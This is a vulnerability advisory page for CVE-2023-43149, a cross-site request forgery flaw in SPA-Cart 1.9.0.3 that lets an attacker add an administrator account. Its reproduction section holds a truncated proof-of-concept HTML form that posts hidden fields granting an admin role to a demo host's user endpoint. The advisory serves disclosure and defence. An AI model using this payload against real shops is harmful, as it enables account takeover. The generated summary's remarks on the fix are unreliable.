CVE-2023-43149
Description
SPA-Cart 1.9.0.3 is vulnerable to Cross Site Request Forgery (CSRF) that allows a remote attacker to add an admin user with role status.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Affected products
2(expand)+ 1 more
- (no CPE)
- (no CPE)range: =1.9.0.3
Patches
Vulnerability mechanics
Root cause
"The application lacks CSRF protection on the user creation endpoint."
Attack vector
A remote attacker can exploit this vulnerability by tricking an authenticated administrator into clicking a crafted HTML link or opening a malicious file [ref_id=1]. This action submits a POST request to the user creation endpoint, allowing the attacker to add a new administrator user with a specified role status [ref_id=1]. The vulnerability is present in SPA-Cart version 1.9.0.3.
Affected code
The vulnerability affects the user creation functionality within SPA-Cart version 1.9.0.3. Specifically, the endpoint that handles the addition of new users, which is susceptible to Cross-Site Request Forgery attacks.
What the fix does
The advisory does not specify a patch or provide remediation guidance. Therefore, the exact fix is not detailed. However, to address this CSRF vulnerability, developers should implement anti-CSRF tokens or other appropriate security measures to validate the origin of requests to sensitive endpoints.
Preconditions
- authThe victim must be an authenticated administrator.
Reproduction
1 - Make an file with with this CODE and SAVE in HTML Attack Delete All Account
<html> <body> <form action="https://demo.spa-cart.com/admin/user/859" method="POST" enctype="multipart/form-data"> <input type="hidden" name="posted_data[firstname]" value="mal1" /> <input type="hidden" name="posted_data[lastname]" value="mal2" /> <input type="hidden" name="posted_data[phone]" value="156415641561" /> <input type="hidden" name="posted_data[email]" value="mal1@test.com" /> <input type="hidden" name="password" value="" /> <input type="hidden" name="posted_data[usertype]" value="C" /> <input type="hidden" name="posted_data[roleid]" value="1" /> <input type="hidden" name="posted_data[status]" value="1" /> <input type="hidden" name="posted_data[address]" value="" /> <input type="hidden" name="posted_data[city]" value="" /> <input type="hidden" name="posted_data[state]" value="" /> <input type="hidden" name="posted_data[country]" value="AG" /> <input type="hidden" name="posted_data[zipcode]" value="05584" /> <input type="hidden" name="posted_data[pending_membershipid]"
Generated on Jun 6, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
News mentions
0No linked articles in our index yet.